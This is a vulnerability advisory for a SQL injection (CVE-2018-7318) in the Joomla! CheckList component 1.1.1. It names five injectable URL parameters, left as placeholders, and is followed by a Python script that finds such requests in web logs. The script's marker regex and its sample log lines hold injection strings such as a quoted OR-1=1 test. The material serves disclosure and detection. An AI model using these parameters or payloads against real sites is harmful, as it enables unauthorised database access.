Joomla! CheckList component version 1.1.1 suffers from a remote SQL injection vulnerability.
# # # #
# Exploit Title: Joomla! Component CheckList 1.1.1 - SQL Injection
# Dork: N/A
# Date: 22.02.2018
# Vendor Homepage: https://www.joomplace.com/
# Software Link: https://extensions.joomla.org/extensions/extension/living/personal-life/checklist/
# Version: 1.1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-7318
# # # #
# Exploit Author: Ihsan Sencan
# # # #
#
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_checklist&view=frontend
# &title_search=[SQL]
# &tag_search=[SQL]
# &name_search=[SQL]
# &description_search=[SQL]
# &filter_order=[SQL]
#
# # # #
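
Detection sketch for the request pattern above, as an added example that is not part of the original advisory: it scans web-server access-log lines for com_checklist requests whose listed parameters carry SQL syntax. The log format (combined, GET query strings), the marker list, the identifier rule for filter_order, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory lists as injectable.
SEARCH_PARAMS = ("title_search", "tag_search", "name_search", "description_search")
ORDER_PARAM = "filter_order"

# Assumption: a legitimate sort column is a plain, optionally table-qualified identifier.
ORDER_OK = re.compile(r"[A-Za-z_][A-Za-z0-9_]*(?:\.[A-Za-z_][A-Za-z0-9_]*)?")
# Heuristic SQL syntax markers for the free-text search fields (tune to your traffic).
SQL_MARKERS = re.compile(
    r"['\";]|--|/\*|\b(?:union|select|sleep|benchmark)\b[\s(]", re.IGNORECASE
)
# Request part of a combined-format access-log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def suspicious_params(log_line):
    """Return sorted names of CheckList parameters in one log line that look injected."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    # parse_qs percent-decodes values, so encoded quotes and spaces are seen as sent.
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "com_checklist" not in query.get("option", []):
        return []
    hits = set()
    for name in SEARCH_PARAMS:
        if any(SQL_MARKERS.search(v) for v in query.get(name, [])):
            hits.add(name)
    # An empty sort field is tolerated; anything else must be a bare identifier.
    if any(v and not ORDER_OK.fullmatch(v) for v in query.get(ORDER_PARAM, [])):
        hits.add(ORDER_PARAM)
    return sorted(hits)


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Feb/2018:10:00:01 +0000] "GET /index.php?option=com_checklist&view=frontend&title_search=groceries&filter_order=title HTTP/1.1" 200 5120',
    '192.0.2.44 - - [22/Feb/2018:10:00:07 +0000] "GET /index.php?option=com_checklist&view=frontend&title_search=x%27+OR+%271%27%3D%271&filter_order=title HTTP/1.1" 200 5120',
    '192.0.2.44 - - [22/Feb/2018:10:00:09 +0000] "GET /index.php?option=com_checklist&view=frontend&filter_order=%28SELECT+1%29 HTTP/1.1" 500 312',
    '192.0.2.10 - - [22/Feb/2018:10:00:12 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        flagged = suspicious_params(line)
        if flagged:
            print(line.split()[0], "->", ", ".join(flagged))
```

Quote characters also occur in ordinary search text, so hits on the four search fields are leads to review; a filter_order value that is not a bare identifier is the stronger signal.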